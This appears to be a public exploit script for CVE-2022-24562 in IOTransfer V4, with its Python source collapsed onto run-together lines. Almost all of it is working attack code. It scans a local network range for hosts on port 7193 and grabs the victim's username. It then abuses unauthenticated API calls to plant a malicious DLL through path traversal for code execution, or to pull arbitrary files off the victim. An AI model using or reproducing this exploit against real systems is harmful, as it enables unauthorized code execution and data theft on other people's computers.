IOTransfer 4.0 Remote Code Execution

# Exploit Title: IOTransfer V4 – Remote Code Execution (RCE)# Date: 06/22/2022# Exploit Author: Tomer Peled# Vendor Homepage: https://www.iobit.com# Software Link: https://iotransfer.itopvpn.com/# Version: V4 and onward# Tested on: Windows 10# CVE : 2022-24562# References: https://github.com/tomerpeled92/CVE/tree/main/CVE-2022%E2%80%9324562import osfrom urllib3.exceptions import ConnectTimeoutErrorfrom win32com.client import *import requestsimport jsonlocalPayloadPath = r"c:\temp\malicious.dll"remotePayloadPath="../Program Files (x86)/Google/Update/goopdate.dll"remoteDownloadPath = r'C:\Users\User\Desktop\obligationservlet.pdf'Range = "192.168.89"UpOrDown="Upload"IP = ""UserName = ""def get_version_number(file_path):    information_parser = Dispatch("Scripting.FileSystemObject")    version = information_parser.GetFileVersion(file_path)    return versiondef getTaskList(IP, taskid=""):    print("Getting task list...")    url = f'http://{IP}:7193/index.php?action=gettasklist&userid=*'    res = requests.get(url)    tasks = json.loads(res.content)    tasks = json.loads(tasks['content'])    for task in tasks['tasks']:        if taskid == task['taskid']:            print(f"Task ID found: {taskid}")def CreateUploadTask(IP):    SetSavePath(IP)    url = f'http://{IP}:7193/index.php?action=createtask'    task = {        'method': 'get',        'version': '1',        'userid': '*',        'taskstate': '0',    }    res = requests.post(url, json=task)    task = json.loads(res.content)    task = json.loads(task['content'])    taskid = task['taskid']    print(f"[*] TaskID: {taskid}")    return taskiddef CreateUploadDetailNode(IP, taskid, remotePath, size='100'):    url = f'http://{IP}:7193/index.php?action=settaskdetailbyindex&userid=*&taskid={taskid}&index=0'    file_info = {        'size': size,        'savefilename': remotePath,        'name': remotePath,        'fullpath': r'c:\windows\system32\calc.exe',        'md5': 'md5md5md5md5md5',        'filetype': '3',    }    res = requests.post(url, json=file_info)    js = json.loads(res.content)    print(f"[V] Create Detail returned: {js['code']}")def readFile(Path):    file = open(Path, "rb")    byte = file.read(1)    next = "Start"    while next != b'':        byte = byte + file.read(1023)        next = file.read(1)        if next != b'':            byte = byte + next    file.close()    return bytedef CallUpload(IP, taskid, localPayloadPath):    url = f'http://{IP}:7193/index.php?action=newuploadfile&userid=*&taskid={taskid}&index=0'    send_data = readFile(localPayloadPath)    try:        res = requests.post(url, data=send_data)        js = json.loads(res.content)        if js['code'] == 200:            print("[V] Success payload uploaded!")        else:            print(f"CreateRemoteFile: {res.content}")    except:        print("[*] Reusing the task...")        res = requests.post(url, data=send_data)        js = json.loads(res.content)        if js['code'] == 200 or "false" in js['error']:            print("[V] Success payload uploaded!")        else:            print(f"[X] CreateRemoteFile Failed: {res.content}")def SetSavePath(IP):    url = f'http://{IP}:7193/index.php?action=setiotconfig'    config = {        'tasksavepath': 'C:\\Program '    }    requests.post(url, json=config)def ExploitUpload(IP,payloadPath,rPath,taskid =None):    if not taskid:        taskid = CreateUploadTask(IP)        size = os.path.getsize(payloadPath)    CreateUploadDetailNode(IP, taskid, remotePath=rPath, size=str(size))    CallUpload(IP, taskid, payloadPath)def CreateDownloadTask(IP, Path) -> str:    url = f'http://{IP}:7193/index.php?action=createtask'    task = {        'method': 'get',        'version': '1',        'userid': '*',        'taskstate': '0',        'filepath': Path    }    res = requests.post(url, json=task)    task = json.loads(res.content)    task = json.loads(task['content'])    taskid = task['taskid']    print(f"TaskID: {taskid}")    return taskiddef ExploitDownload(IP, DownloadPath, ID=None):    if ID:        url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={ID}'    else:        taskid = CreateDownloadTask(IP, DownloadPath)        url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={taskid}'    res = requests.get(url)    return resdef ScanIP(startRange):    print("[*] Searching for vulnerable IPs", end='')    Current = 142    IP = f"{startRange}.{Current}"    VulnerableIP: str = ""    UserName: str = ""    while Current < 252:        print(".", end='')        url = f'http://{IP}:7193/index.php?action=getpcname&userid=*'        try:            res = requests.get(url, timeout=1)            js = json.loads(res.content)            js2 = json.loads(js['content'])            UserName = js2['name']            VulnerableIP=IP            print(f"\n[V] Found a Vulnerable IP: {VulnerableIP}")            print(f"[!] Vulnerable PC username: {UserName}")            return VulnerableIP,UserName        except Exception as e:            pass        except ConnectTimeoutError:            pass        IP = f"{startRange}.{Current}"        Current = Current + 1    return None,Noneif __name__ == '__main__':    IP,UserName = ScanIP(Range)    if IP is None or UserName is None:        print("[X] No vulnerable IP found")        exit()    print("[*] Starting Exploit...")    if UpOrDown == "Upload":        print(f"[*]Local Payload Path: {localPayloadPath}")        print(f"[*]Remote Upload Path: {remotePayloadPath}")        ExploitUpload(IP,localPayloadPath,remotePayloadPath)    elif UpOrDown == "Download":        print(f"[*] Downloading the file: {remoteDownloadPath}")        res = ExploitDownload(IP, remoteDownloadPath)        file = open("out.pdf", "wb+")        file.write(res.content)        file.close()